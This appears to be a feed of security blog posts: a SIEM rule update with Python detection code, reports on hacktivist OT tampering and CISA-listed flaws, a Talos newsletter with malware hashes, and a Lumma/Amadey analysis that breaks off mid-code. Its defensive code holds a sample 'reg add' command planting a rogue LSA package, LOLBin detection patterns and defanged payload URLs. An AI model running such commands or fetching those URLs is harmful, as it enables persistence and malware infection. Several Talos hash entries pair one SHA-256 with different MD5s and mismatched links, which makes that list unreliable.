scriptPath names the logon script that runs every time the user signs in, and msTSInitialProgram names the program launched when the user opens a Remote Desktop Services session, so either gives an attacker code execution at each logon. This makes them an attractive target for attackers aiming to establish persistence in the network. Tampering with these attributes may indicate unauthorized attempts to gain a foothold in the system or escalate privileges, technique T1037.003 under the MITRE ATT&CK classification.

The strategy for detecting these manipulations is to monitor Windows event logs — particularly event 5136. This event records any changes made to objects in Active Directory, including attribute modifications.
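As an added illustration, not Kaspersky's rule logic or the platform's rule syntax, the following Python sketch applies the same detection ideas to a handful of constructed Windows security events (4657, 4610/4614/4622, 4688 and 5136) flattened into dictionaries. The EventData field names, the allowlist of built-in packages and the sample records are assumptions made for the example; a production rule would be built from the real event schema and a known-good baseline of the packages your hosts load.

```python
import re

# Registry values under HKLM\SYSTEM\CurrentControlSet\Control\Lsa that name the DLLs
# LSA loads, mapped to the ATT&CK sub-technique each one enables.
LSA_VALUE_TO_TECHNIQUE = {
    "authentication packages": "T1547.002",
    "security packages": "T1547.005",
    "notification packages": "T1556.002",
}

# Security-log event raised when such a package is loaded:
# event ID -> (technique, EventData field that carries the package name).
# Field names are assumed from the standard event XML; confirm them on your own hosts.
PACKAGE_LOAD_EVENTS = {
    4610: ("T1547.002", "AuthenticationPackageName"),
    4622: ("T1547.005", "SecurityPackageName"),
    4614: ("T1556.002", "NotificationPackageName"),
}

# Constructed allowlist of packages a stock Windows build loads; derive the real
# baseline from a known-good machine instead of copying this list.
KNOWN_PACKAGES = {"msv1_0", "kerberos", "negotiate", "schannel", "wdigest",
                  "tspkg", "pku2u", "cloudap", "scecli", "rassfm"}

# AD attributes that run code at logon; changes to them are logged as event 5136.
AD_LOGON_ATTRIBUTES = {"scriptpath", "mstsinitialprogram"}

# reg.exe or PowerShell command lines that rewrite one of the three LSA values.
LSA_CMD_RE = re.compile(
    r"(?:reg(?:\.exe)?\s+add|set-itemproperty|new-itemproperty)"
    r".*control\\lsa\b.*?"
    r"(authentication|security|notification)\s*packages",
    re.I,
)


def package_stem(name: str) -> str:
    """'C:\\Windows\\system32\\msv1_0.DLL : MICROSOFT_AUTHENTICATION_PACKAGE_V1_0' -> 'msv1_0'."""
    stem = name.split(" : ")[0].rsplit("\\", 1)[-1].lower()
    return stem[:-4] if stem.endswith(".dll") else stem


def evaluate(event: dict) -> list:
    """Return [(rule_name, technique), ...] for one event whose EventData is flattened into the dict."""
    hits = []
    eid = event.get("EventID")
    if eid == 4657:  # registry value modified; only generated when a SACL exists on the Lsa key
        key = event.get("ObjectName", "").lower()
        value = event.get("ObjectValueName", "").lower()
        if key.endswith("\\control\\lsa") and value in LSA_VALUE_TO_TECHNIQUE:
            hits.append(("lsa_registry_value_modified", LSA_VALUE_TO_TECHNIQUE[value]))
    elif eid in PACKAGE_LOAD_EVENTS:
        technique, field = PACKAGE_LOAD_EVENTS[eid]
        if package_stem(event.get(field, "")) not in KNOWN_PACKAGES:
            hits.append(("unknown_lsa_package_loaded", technique))
    elif eid == 4688:  # process creation; the command line is only present with command-line auditing on
        m = LSA_CMD_RE.search(event.get("CommandLine", ""))
        if m:
            technique = LSA_VALUE_TO_TECHNIQUE[m.group(1).lower() + " packages"]
            hits.append(("lsa_registry_modified_via_commandline", technique))
    elif eid == 5136:  # directory service object modified
        if event.get("AttributeLDAPDisplayName", "").lower() in AD_LOGON_ATTRIBUTES:
            hits.append(("ad_logon_attribute_changed", "T1037.003"))
    return hits


def triage(events: list) -> list:
    """Run every rule over a batch; returns [(event_index, rule_name, technique), ...]."""
    return [(i, rule, tech) for i, ev in enumerate(events) for rule, tech in evaluate(ev)]


# Constructed sample events (not real telemetry), flattened to the fields the rules read.
SAMPLE_EVENTS = [
    {"EventID": 4657, "ObjectName": "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa",
     "ObjectValueName": "Security Packages", "ProcessName": "C:\\Windows\\System32\\reg.exe"},
    {"EventID": 4622, "SecurityPackageName": "C:\\Windows\\system32\\evilssp.dll"},
    {"EventID": 4610, "AuthenticationPackageName":
        "C:\\Windows\\system32\\msv1_0.DLL : MICROSOFT_AUTHENTICATION_PACKAGE_V1_0"},
    {"EventID": 4688, "CommandLine":
        'reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa /v "Notification Packages" '
        '/t REG_MULTI_SZ /d "scecli\\0evilfilter" /f'},
    {"EventID": 5136, "AttributeLDAPDisplayName": "scriptPath",
     "AttributeValue": "\\\\dc01\\netlogon\\update.bat"},
    {"EventID": 5136, "AttributeLDAPDisplayName": "description", "AttributeValue": "Finance"},
]

if __name__ == "__main__":
    for index, rule, technique in triage(SAMPLE_EVENTS):
        print(f"event {index}: {rule} -> {technique}")
```

The allowlist approach is what keeps the 4610/4614/4622 rules quiet on a healthy host: the built-in packages load at every boot, so alerting on the event alone would be noise. Likewise 4657 and the 4688 command line only exist if object-access auditing (with a SACL on the Lsa key) and command-line auditing are switched on, which is worth verifying before relying on these rules.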

After the latest update, our SIEM platform will provide over 700 rules, so that by the end of 2024 our solution will cover 400 MITRE ATT&CK techniques. Of course, we are not aiming to create rules for every technique described in the matrix. A significant portion of them cannot be fully addressed due to their nature, for example techniques involving actions performed outside the protected perimeter, or techniques that a SIEM by definition cannot fully cover. In the fourth quarter of this year we have therefore focused on further expanding the coverage of MITRE ATT&CK techniques while enhancing the detection logic for techniques already covered.

New and improved normalizers

In the latest update, we’ve also added normalizers to our SIEM system that support the following event sources:

  • [OOTB] McAfee Endpoint DLP syslog
  • [OOTB] LastLine Enterprise syslog cef
  • [OOTB] MongoDb syslog
  • [OOTB] GajShield Firewall syslog
  • [OOTB] Eltex ESR syslog
  • [OOTB] Linux auditd syslog for KUMA 3.2
  • [OOTB] Barracuda Cloud Email Security Gateway syslog
  • [OOTB] Yandex Cloud
  • [OOTB] InfoWatch Person Monitor SQL
  • [OOTB] Kaspersky Industrial CyberSecurity for Networks 4.2 syslog

In addition, our experts have improved the following normalizers:

  • [OOTB] Microsoft Products via KES WIN
  • [OOTB] Microsoft Products for KUMA 3
  • [OOTB] KSC from SQL
  • [OOTB] Ideco UTM syslog
  • [OOTB] KEDR telemetry
  • [OOTB] Vipnet TIAS syslog
  • [OOTB] PostgreSQL pgAudit syslog
  • [OOTB] KSC PostgreSQL
  • [OOTB] Linux auditd syslog for KUMA 3.2

The full list of supported event sources in Kaspersky Unified Monitoring and Analysis Platform 3.4 can be found in the Online Help, where you can also find information on correlation rules. In our blog you can also read about the updates for our SIEM platform for the first, second and third quarters of 2024.

To learn more about our SIEM system, the Kaspersky Unified Monitoring and Analysis Platform, please visit the official product page.


Russian Hacktivists Increasingly Tamper with Energy and Water System Controls


Overview 

Two Russian hacktivist groups are increasingly targeting critical infrastructure in the U.S. and elsewhere, and their attacks go well beyond the DDoS attacks and website defacements that hacktivist groups typically engage in. 

The groups, the People’s Cyber Army and Z-Pentest, have posted videos to their Telegram channels allegedly showing members tampering with operational technology (OT) controls, most notably in the oil and gas and water sectors. 

Those claims, documented by Cyble dark web researchers, may largely be intended to establish credibility rather than inflict damage on targets, but within the last week Z-Pentest’s claims have escalated to include disrupting one U.S. oil well system. 

The groups have also accessed operational controls for critical infrastructure in other countries, notably Canada, Australia, France, South Korea, Taiwan, Italy, Romania, Germany and Poland, often claiming retaliation for a country’s support for Ukraine in its war with Russia. 

Some of the attacks have been publicly reported – most notably the People’s Cyber Army attacks on water facilities – but Z-Pentest’s claims of energy sector attacks have largely flown under the radar. 

It is not clear how much damage the Russian groups could do or are capable of, but given repeated warnings from U.S. cybersecurity and intelligence agencies about China’s deep penetration of U.S. critical infrastructure, these environments should be considered deeply vulnerable and strengthened accordingly. 

Z-Pentest’s Activities 

Z-Pentest appears to have been active only since October, but in those two months Cyble’s dark web research team has recorded 10 claims of attacks by the group, all involving accessing control panels in critical infrastructure environments. Their main Telegram channel was recently shut down but the group maintains a presence on X and claims to be based in Serbia. 

Z-Pentest’s most recent claim involved disrupting critical systems at an oil well site, including systems responsible for water pumping, petroleum gas flaring, and oil collection. A 6-minute screen recording shows detailed screenshots of the facility’s control systems, showing tank setpoints, vapor recovery metrics, and operational dashboards, allegedly accessed and changed during the breach. It is not clear where that oil facility is located, but the other two U.S. oil facility claims appear to correspond with known locations and companies. 

In one of the other two claimed attacks, the threat group released a 4-minute screen recording where they accessed a range of operational controls (identifying information removed from example below). 

While the hackers may well be accessing sensitive environments, it is not clear how much damage they could do. Programmable logic controllers (PLCs), for example, often include safety features that can prevent damaging actions from occurring, but the fact that such environments are accessible to threat actors is nonetheless concerning. 

Cyble has in general observed increased threat activity targeting the energy sector in recent months. Dark web claims and ransomware attacks have increased, and network access and zero-day vulnerabilities have been offered for sale on dark web market places. Cyble has observed instances where credentials for energy network access were offered for sale on the dark web before larger breaches and attacks occurred, suggesting that monitoring for credential leaks may be an important defense for preventing larger breaches later. 

People’s Cyber Army Activities 

The better-known People’s Cyber Army (PCA) – also known as the Cyber Army of Russia Reborn – has also been targeting critical infrastructure controls in the U.S. and elsewhere, and there have been some suggestions that PCA and Z-Pentest may be working together. While many of the group’s activities have involved DDoS attacks, recent claims have included access to the control panels of a U.S. environmental cleanup company and water systems in Texas and Delaware. 

Water and wastewater systems are considered particularly vulnerable by some OT security specialists, in part because communities are ill-equipped to deal without them for any length of time. 

The People’s Cyber Army struck twice in late August and September, releasing screen recordings showing the group tampering with system settings on control panels at the Stanton Water Treatment Plant in Stanton, Texas, and New Castle, Delaware water towers (images below). 

Image above: Stanton Water Treatment Plant attack 

Image above: Delaware water tower attack 

In the Texas case, the hackers were able to open valves and release untreated water, but otherwise no damage is believed to have occurred. 

In all, Cyble has documented eight water system attacks by the People’s Cyber Army this year in the U.S. and elsewhere, including a January attack that caused water storage tanks to overflow in Abernathy and Muleshoe, Texas. The group has been targeting Ukraine allies since 2022, and was sanctioned by the U.S. government in July 2024. 

Conclusion 

Security weaknesses in critical infrastructure organizations are by now a well-documented phenomenon, but the recent spate of attacks targeting energy and water facilities suggests a concerning escalation in the exploitation of these vulnerable environments. The emergence of Z-Pentest as a new threat actor in this space should be taken seriously, as the group has demonstrated an apparent ability to penetrate these environments and access – and tinker with – operational control panels. 

Critical infrastructure environments often cannot afford downtime, and end-of-life devices often remain in service long after support has ended. With those challenges in mind, below are some general recommendations for improving the security of critical environments: 

  1. Organizations should follow ICS/OT vulnerability announcements and apply patches as soon as they become available. Staying up to date with vendor updates and security advisories is critical to ensuring that vulnerabilities are addressed promptly. 

  2. Segregating ICS/OT/SCADA networks from other parts of the IT infrastructure can help prevent lateral movement in case of a breach. Implementing a Zero-Trust Architecture is also advisable to limit the potential for exploitation. Devices that do not need to be exposed to the internet should not be, and those that require web exposure should be protected to the extent possible. 

  3. Regular cybersecurity training for all personnel, particularly those with access to Operational Technology (OT) systems, can help prevent human error and reduce the risk of social engineering attacks. 

  4. Ongoing vulnerability scanning and penetration testing can help identify and address weaknesses before attackers exploit them. Engaging threat intelligence services and staying updated with vulnerability intelligence reports is essential for proactive defense. 

  5. Developing a robust incident response plan and conducting regular security drills ensures that organizations are prepared for a quick and coordinated response to any security incidents that may arise. 

The post Russian Hacktivists Increasingly Tamper with Energy and Water System Controls appeared first on Cyble.


CISA Updates Known Exploited Vulnerabilities Catalog, Adding 3 Critical Flaws


Overview 

The Cybersecurity and Infrastructure Security Agency (CISA) has recently updated its Known Exploited Vulnerabilities (KEV) Catalog, adding three flaws that are being actively exploited. The newly added vulnerabilities, CVE-2023-45727, CVE-2024-11680 and CVE-2024-11667, affect a file-sharing suite, an open-source file-management application and a line of firewalls, all of them products found in sectors such as manufacturing, telecommunications and energy. 

The first flaw added to the Known Exploited Vulnerabilities (KEV) catalog, CVE-2023-45727, affects North Grid’s Proself product suite, including versions prior to 5.62 of Proself Enterprise/Standard Edition, 1.65 of Proself Gateway Edition, and 1.08 of Proself Mail Sanitize Edition. The second vulnerability, CVE-2024-11680, affects ProjectSend, an open-source file management application.  

The last vulnerability, CVE-2024-11667, impacts several Zyxel firewall products, including the ATP series, USG FLEX series, USG FLEX 50(W), and USG20(W)-VPN series, with versions prior to 5.38 being affected. Organizations using these products are urged to apply patches promptly to mitigate the risks associated with these vulnerabilities. 

Technical Details of the Vulnerabilities 

CVE-2023-45727: Proself Vulnerability in North Grid Proself Systems 

One of the newly cataloged vulnerabilities, CVE-2023-45727, affects North Grid Corporation’s Proself product suite. Specifically, the vulnerability is found in versions prior to 5.62 of Proself Enterprise/Standard Edition, 1.65 of Proself Gateway Edition, and 1.08 of Proself Mail Sanitize Edition. This flaw allows attackers to exploit improper restrictions on XML External Entity (XXE) processing, which can lead to remote unauthenticated attacks. 

By submitting specially crafted XML data, attackers can gain access to sensitive files, including those containing account information. This opens the door for data theft or manipulation. The CVSS score for CVE-2023-45727 is notably high, signaling the severity of this flaw. 

CVE-2024-11680: ProjectSend Authentication Vulnerability 

CVE-2024-11680 is an improper-authentication issue in ProjectSend, an open-source file management application. In versions prior to r1720, remote, unauthenticated attackers can send crafted HTTP requests that change the application’s configuration. 

Exploiting this flaw, attackers can bypass the authentication mechanism, modify system settings, create new accounts, and upload malicious content such as webshells and embedded JavaScript. 

The critical nature of this vulnerability is reflected in its CVSS score of 9.8, which places it in the critical band and signals the potential for extensive compromise if left unaddressed. Remote attackers do not require prior access or authentication to exploit it, making it even more dangerous for organizations running ProjectSend versions below r1720. 

CVE-2024-11667: Zyxel Path Traversal in Multiple Firewalls 

The third vulnerability in CISA’s latest update is CVE-2024-11667, which affects several Zyxel firewall products. Specifically, the flaw resides in the web management interface of ATP series and USG FLEX series firewalls, as well as USG FLEX 50(W) and USG20(W)-VPN series devices. Versions of these products prior to 5.38 are susceptible to a path traversal vulnerability, which allows attackers to manipulate file paths and potentially download or upload arbitrary files. 

The flaw could allow attackers to access sensitive files or upload malicious software onto affected devices. With a CVSS score of 7.5, this vulnerability is deemed high-risk but not as critical as CVE-2024-11680. However, for organizations relying on Zyxel products to secure their networks, addressing this flaw is essential to prevent unauthorized access and maintain the integrity of their firewalls. 
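The advisory names the bug class but not the affected code, so the following is an added example of how the path-traversal class is closed on the server side (it is not Zyxel’s, ProjectSend’s or Proself’s code). The Python resolver maps a client-supplied file name onto a fixed base directory and rejects the usual escapes: `..` segments, percent-encoded and double-encoded dots, backslash separators, absolute paths, and symlinks inside the directory that point outside it. The directory layout and request strings in `run_cases()` are constructed for the example.

```python
import os
import posixpath
import shutil
import tempfile
from urllib.parse import unquote


def canonical_request_path(requested: str) -> str:
    """Decode and normalise a client-supplied path fragment without touching the filesystem."""
    decoded = requested
    for _ in range(3):  # %252e%252e%252f only becomes ../ after a second decode pass
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    decoded = decoded.replace("\\", "/")  # Windows-style separators count as separators
    if posixpath.isabs(decoded) or decoded.startswith("//"):
        raise ValueError("absolute path rejected")
    return posixpath.normpath(decoded)


def resolve_inside(base_dir: str, requested: str) -> str:
    """Return the real path of `requested` under base_dir, or raise ValueError if it would escape."""
    rel = canonical_request_path(requested)
    if rel == ".." or rel.startswith("../"):
        raise ValueError("traversal rejected")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, *rel.split("/")))
    # realpath follows symlinks, so a link inside base that points outside it fails this check.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes base directory")
    return candidate


def run_cases() -> dict:
    """Build a throwaway tree (constructed for the example) and classify a set of sample requests."""
    root = tempfile.mkdtemp()
    try:
        base = os.path.join(root, "www")
        os.makedirs(base)
        with open(os.path.join(base, "report.pdf"), "w") as fh:
            fh.write("public")
        with open(os.path.join(root, "secret.txt"), "w") as fh:
            fh.write("private")
        os.symlink(os.path.join(root, "secret.txt"), os.path.join(base, "link"))
        requests = [
            "report.pdf",                 # legitimate
            "sub/../report.pdf",          # harmless dot-dot that stays inside base
            "../secret.txt",              # classic traversal
            "%2e%2e/secret.txt",          # percent-encoded dots
            "%252e%252e%252fsecret.txt",  # double-encoded
            "..\\secret.txt",             # backslash separator
            "/etc/passwd",                # absolute path
            "link",                       # symlink inside base pointing outside
        ]
        results = {}
        for req in requests:
            try:
                resolve_inside(base, req)
                results[req] = "ok"
            except ValueError:
                results[req] = "rejected"
        return results
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for req, verdict in run_cases().items():
        print(f"{req!r:32} {verdict}")
```

The two halves matter equally: the lexical pass catches encoded and mixed-separator tricks that a naive `startswith` check on the joined string would miss, and the `realpath` comparison is the only thing that catches a symlink, which no amount of string inspection can see.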

Sector-Wide Impact of Known Exploited Vulnerabilities 

These newly cataloged vulnerabilities underline the ongoing risk to organizations whose file-transfer and network-edge systems sit in front of critical infrastructure networks. Flaws in products like Proself, ProjectSend, and Zyxel firewalls expose them to a range of cyberattacks, including unauthorized access, data exfiltration, and service disruption. Such vulnerabilities are particularly concerning for sectors like energy, critical manufacturing, and telecommunications, where any disruption can have far-reaching consequences. 

With CVE-2023-45727, CVE-2024-11680, and CVE-2024-11667 now added to the list of Known Exploited Vulnerabilities, organizations using these products must adopt upgraded cybersecurity measures to defend against attacks. Organizations are strongly encouraged to follow best practices in patch management, including regularly applying vendor-issued patches and updates.  

For example, users of Proself should upgrade to newer versions that address the XXE vulnerability, while ProjectSend users should ensure they are running r1720 or later. Additionally, Zyxel firewall users should promptly update firmware versions to mitigate the path traversal flaw. 

Mitigation and Recommendation Strategies 

To mitigate the risks associated with these vulnerabilities, organizations are advised to implement several key cybersecurity measures: 

  1. Ensure that all systems are regularly updated with the latest security patches to reduce the risk of exploitation from Known Exploited Vulnerabilities. 

  2. Adopt a zero-trust model where all access requests are treated as potentially hostile, requiring stringent verification before granting access. 

  3. Segment networks so that a breach can be contained and attackers cannot move laterally into critical systems. 

  4. Implement multi-factor authentication (MFA) to protect sensitive systems and reduce the likelihood of unauthorized access. 

  5. Regularly conduct vulnerability scans, penetration testing, and security audits to identify and address weaknesses before they can be exploited. 

Conclusion 

The recent updates to CISA’s Known Exploited Vulnerabilities catalog highlight the urgency to address critical security flaws in widely used products. The vulnerabilities in North Grid’s Proself, ProjectSend, and Zyxel firewall systems can expose businesses to a range of cyber threats, including unauthorized access, data theft, and system manipulation.  

As these vulnerabilities can be leveraged for cyberattacks, organizations must apply timely patches, follow best practices in patch management, and adopt cybersecurity strategies. Implementing security measures such as multi-factor authentication, network segmentation, and regular vulnerability assessments will help organizations protect against potential breaches and reduce the risk of exploitation. 


The post CISA Updates Known Exploited Vulnerabilities Catalog, Adding 3 Critical Flaws appeared first on Cyble.


The adventures of an extroverted cyber nerd and the people Talos helps to fight the good fight


Welcome to this week’s edition of the Threat Source newsletter. 

I am unbelievably lucky to do the work that I do. My title is technically ‘Senior Security Strategist’. It’s a very fancy title, but basically: I get to research threats with my colleagues and friends to keep people safe here at Talos. I also get to travel and talk to our customers and communities about that work and how we fight that good fight. This has taken me to some interesting places – from Ukraine to California and lots of places in between. Not bad for a guy from a small town in Alabama.  

This gig isn’t for everyone. You must have some extroverted tendencies, and as the youth would say, some ‘rizz’. It’s not enough to talk about something like, say, ransomware. You need to be able to explain it in high technical detail if needed and then explain it to a board of C-levels and speak the language of business they understand. And you need to do it in an engaging way to keep your audiences bought in. It’s a unique blend of security practitioner expertise and the ability to communicate that to audiences, some technical, some not.  

If you’re thinking this also requires some kind of social media influencer level of Hemsworth caliber good looks and hyper charisma, have no fear. I’m about as much a security influencer as Chris Farley was a Beverly Hills ninja. I am just a security nerd who likes to talk. Like I said – I’m very lucky.  

Sometimes this gig takes you to very unexpected places. A couple of weeks ago I found myself at the Ford Foundation Center for Social Justice. I was there to attend and support the NGO-ISAC annual summit. The NGO-ISAC ‘is a non-profit organization improving the cybersecurity of US-based nonprofits.’ They do amazing work supporting cyber security for non-governmental organizations that help protect and promote civil society. We’re also fortunate at Talos to be a partner with them and donate time and resources to support their mission of helping the helpers.  

We are proud to be partners and volunteer our time with NGO-ISAC and its members. If you ever want to be truly humbled, spend time with an NGO and learn about what they do. The energy and heart those people have is incredible and will inspire you. They help feed the hungry, clothe the homeless, protect refugees, promote democracies, and generally help take care of some of the most vulnerable people and institutions our society relies upon. They also traditionally struggle with cybersecurity – security investments and practitioner expertise can be difficult to obtain when your budgets are built upon donations to support your mission. They are the embodiment of fighting the good fight, and we at Talos will always have the time to help them help others.  

While I was there, we debuted a custom NGO version of Backdoors & Breaches I helped co-develop with the NGO-ISAC. It was a real hit, and we ran demo games that resonated very well with the audiences. Helping teach cybersecurity to NGOs is fantastic. If we can help them stay secure, there are so many others who will be helped by it. Also, keep your eyes peeled for a blog post in January about how we designed and created a custom expansion for Backdoors & Breaches.  

Also, the Ford Foundation? Amazing building. It’s in the heart of NYC and is an island of pure serenity. They have an indoor atrium/park that is next level. They pipe in some absolute jazz bangers throughout the entire building that, mixed with the decor, exudes a class I’ve rarely encountered in my travels. If I could make a blanket out of that entire vibe and wrap myself up in it, I’d do it.  

The one big thing 

QR Codes, am I right? Sometimes you can scan one with your phone and maybe win a free cheeseburger, sometimes it can take you to a fake O365 phishing site. The tricky bit with QR codes in e-mails is how easily they can avoid spam filters. My man Jaeson Schultz did some great research on attacks, prevalence, and detection of QR codes in e-mail messages. The parts on AI-generated QR imagery are fantastic – be careful what you scan! 

Why do I care? 

E-mail phishing and evading defenses are a tried and tested tactic with attackers. QR codes are another method of attack, and because they can be difficult to defang/detect, defenders have to work extra hard to understand those threats and stop them.  

So now what? 

Exercise serious caution when scanning a QR code. If possible, detonate those suspicious QR code e-mails in a sandbox, like Threat Grid. 

Top security headlines of the week 

At least 97 major water systems in the US have serious cybersecurity vulnerabilities and compliance issues, raising concerns that cyberattacks could disrupt businesses, industry, and the lives of millions of citizens. (Dark Reading) 

The NSA updated its mobile devices security best practices report. Reboot those phones at least once a week, friends. (ZDNet) 

The United States and other Western nations released guidance Tuesday designed to evict the China-linked group in the wake of the high-profile hack. (CyberScoop) 

Can’t get enough Talos? 

Upcoming events where you can find Talos 

AVAR (Dec. 4-6)   

Chennai, India  

Vanja Svajcer and Chetan Raghuprasad from Cisco Talos will both present: Vanja will be discussing Exploring Vulnerable Windows Drivers, while Chetan presents Sweet and Spicy Recipes for Government Agencies by SneakyChef.   

Most prevalent malware files from Talos telemetry over the past week  

SHA 256: 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647 

MD5: bbcf7a68f4164a9f5f5cb2d9f30d9790 

VirusTotal: https://www.virustotal.com/gui/file/0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647/details 

Typical Filename: cwjhtmbwgyomzrhbo.exe 

Claimed Product: n/a 

Detection Name: Win.Dropper.Scar::1201  

SHA 256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca 

MD5: 71fea034b422e4a17ebb06022532fdde 

VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507/detection 

Typical Filename: VID001.exe 

Claimed Product: n/a 

Detection Name: Coinminer:MBT.26mw.in14.Talos 

SHA 256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca   

MD5: 200206279107f4a2bb1832e3fcd7d64c  

VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca/details 

Typical Filename: lsgkozfm.bat  

Claimed Product: N/A  

Detection Name: Win.Dropper.Scar::tpd    

SHA 256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca   

MD5: 71fea034b422e4a17ebb06022532fdde   

VirusTotal: https://www.virustotal.com/gui/file/bea312ccbc8a912d4322b45ea64d69bb3add4d818fd1eb7723260b11d76a138a/details 

Typical Filename: VID001.exe   

Claimed Product: N/A   

Detection Name: RF.Talos.80   

SHA 256: 3a2ea65faefdc64d83dd4c06ef617d6ac683f781c093008c8996277732d9bd66   

MD5: 8b84d61bf3ffec822e2daf4a3665308c   

VirusTotal: https://www.virustotal.com/gui/file/3a2ea65faefdc64d83dd4c06ef617d6ac683f781c093008c8996277732d9bd66/details 

Typical Filename: RemComSvc.exe   

Claimed Product: N/A   

Detection Name: W32.3A2EA65FAE-95.SBX.TG   


Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot


Key takeaways

  • Cyble Research and Intelligence Labs (CRIL) identified a malicious campaign targeting the manufacturing industry, leveraging a deceptive LNK file disguised as a PDF file.
  • This campaign leverages multiple Living-off-the-Land Binaries (LOLBins), such as ssh.exe, powershell.exe, and mshta.exe, to bypass traditional security mechanisms and remotely execute the next-stage payload.
  • The Threat Actor (TA) used Google Accelerated Mobile Pages (AMP) URL along with a shortened URL to evade detection by traditional URL scanners.
  • The attack relies heavily on in-memory code injection, where the TAs execute malicious payloads directly in memory to bypass conventional security mechanisms.
  • The attack chain leverages DLL sideloading and IDATLoader to deploy the Lumma stealer and Amadey bot, enabling the attacker to gain control and exfiltrate sensitive information from the victim’s machine.

Overview

CRIL recently identified a multi-stage cyberattack campaign originating from an LNK file. The initial infection vector remains unknown; however, the attack likely begins with a spear-phishing email, prompting the recipient to click on a link that leads to an LNK shortcut file disguised as a PDF document. The file is hosted on a remote WebDAV share at

hxxp://download-695-18112-001-webdav-logicaldoc[.]cdn-serveri4732-ns.shop/Downloads/18112.2022/Instruction_695-18121-002_Rev.PDF.lnk

Upon searching for the file name “695-18121-002_Rev” on Google, we discovered a technical engineering drawing for a component. Additionally, we observed similar samples using the name “Instruction_18112,” which led us to another technical document detailing the installation of a chair. The malicious LNK file hosted on the URL impersonates LogicalDOC, a cloud-based document management system commonly used in Manufacturing and Engineering firms. Based on the targeting and nature of these attacks, we suspect that the campaign is likely targeting the manufacturing industry.

Once executed, the LNK file triggers a command to launch ssh.exe, which subsequently runs a PowerShell command. This PowerShell command fetches and executes an additional malicious payload from a remote server using mshta.exe.

The remote server is accessed via a URL that abuses Google’s Accelerated Mobile Pages (AMP) framework, combined with a shortened URL that redirects to a location hosting malicious PowerShell code.

The PowerShell code then triggers another malicious script hosted on Pastebin, controlled by the TA. This script contains an encoded PowerShell command that downloads a ZIP archive to the Temp directory, extracts its contents, and executes a legitimate executable. The executable, in turn, sideloads a malicious DLL file.

In this sophisticated campaign, the TA uses multiple stages of code injection to deploy the Lumma stealer, which then downloads the Amadey Bot onto the victim’s system. The figure below shows the infection chain.

Infection Chain
Figure 1 – Infection chain

Technical Analysis

Threat Actors are increasingly exploiting LNK files as their initial vector for malware distribution due to their flexibility in executing various commands. In this campaign, they specifically leveraged the Windows SSH client (C:\Windows\System32\OpenSSH\ssh.exe) as an alternative target in the LNK file’s “Target” field. This approach reduces the likelihood of detection compared to using cmd.exe or powershell.exe as the target. The image below shows the LNK command.

SSH, Link
Figure 2 – LNK using SSH as a target

When a user opens the disguised LNK file, it triggers “ssh.exe” to run a PowerShell command through the ProxyCommand option in ssh.exe. The embedded PowerShell command contains obfuscated content, as shown in the image above. The de-obfuscated code attempts to execute PowerShell content hosted at the AMP URL “hxxps://www.google[.]ca/amp/s/goo.su/IwPQJP” using mshta.exe. In this case, the hosted content contains AES-encrypted data, as shown in the image below.
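As an added example, not Cyble’s detection content, the following Python rules express the chain just described over constructed process-creation records: ssh.exe carrying a ProxyCommand whose first token is a LOLBin, a LOLBin whose parent process is ssh.exe, and mshta.exe fetching a URL wrapped in Google’s AMP cache. The record format (pid, ppid, image, cmdline), the sample process tree and the `<obfuscated>` placeholder are assumptions; the AMP URL is the defanged one from the analysis.

```python
import re

# Binaries that, launched from ssh.exe's ProxyCommand, mark the LNK technique described above.
LOLBINS = {"powershell", "pwsh", "cmd", "mshta", "wscript", "cscript"}

# -o ProxyCommand="..."  or  -oProxyCommand=value   (quoted or bare value)
PROXY_RE = re.compile(r'-o\s*ProxyCommand\s*=\s*(?:"([^"]*)"|(\S+))', re.I)

# Any URL, in live or defanged (hxxp, [.]) notation.
URL_RE = re.compile(r"h(?:tt|xx)ps?://\S+", re.I)

# Google AMP cache wrapper: https://www.google.<tld>/amp/s/<real host>/...
AMP_RE = re.compile(r"h(?:tt|xx)ps?://(?:www\.)?google(?:\.|\[\.\])[a-z.\[\]]+/amp/s/", re.I)


def image_name(path: str) -> str:
    """'C:\\Windows\\System32\\OpenSSH\\ssh.exe' -> 'ssh'."""
    name = path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def proxy_command_of(cmdline: str):
    """Return the ProxyCommand value embedded in an ssh command line, or None."""
    m = PROXY_RE.search(cmdline)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def analyze(events: list) -> list:
    """
    events: process-creation records {pid, ppid, image, cmdline} (a constructed format).
    Returns [(pid, rule_name)] for each record matching a stage of the chain.
    """
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        img = image_name(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_img = image_name(parent["image"]) if parent else ""
        if img == "ssh":
            pc = proxy_command_of(e["cmdline"])
            if pc and pc.split() and image_name(pc.split()[0]) in LOLBINS:
                alerts.append((e["pid"], "ssh_proxycommand_lolbin"))
        if img in LOLBINS and parent_img == "ssh":
            alerts.append((e["pid"], "lolbin_spawned_by_ssh"))
        if img == "mshta":
            urls = URL_RE.findall(e["cmdline"])
            if any(AMP_RE.match(u) for u in urls):
                alerts.append((e["pid"], "mshta_google_amp_url"))
            elif urls:
                alerts.append((e["pid"], "mshta_remote_url"))
    return alerts


# Constructed process tree (not real telemetry); <obfuscated> stands in for the encoded payload.
SAMPLE_EVENTS = [
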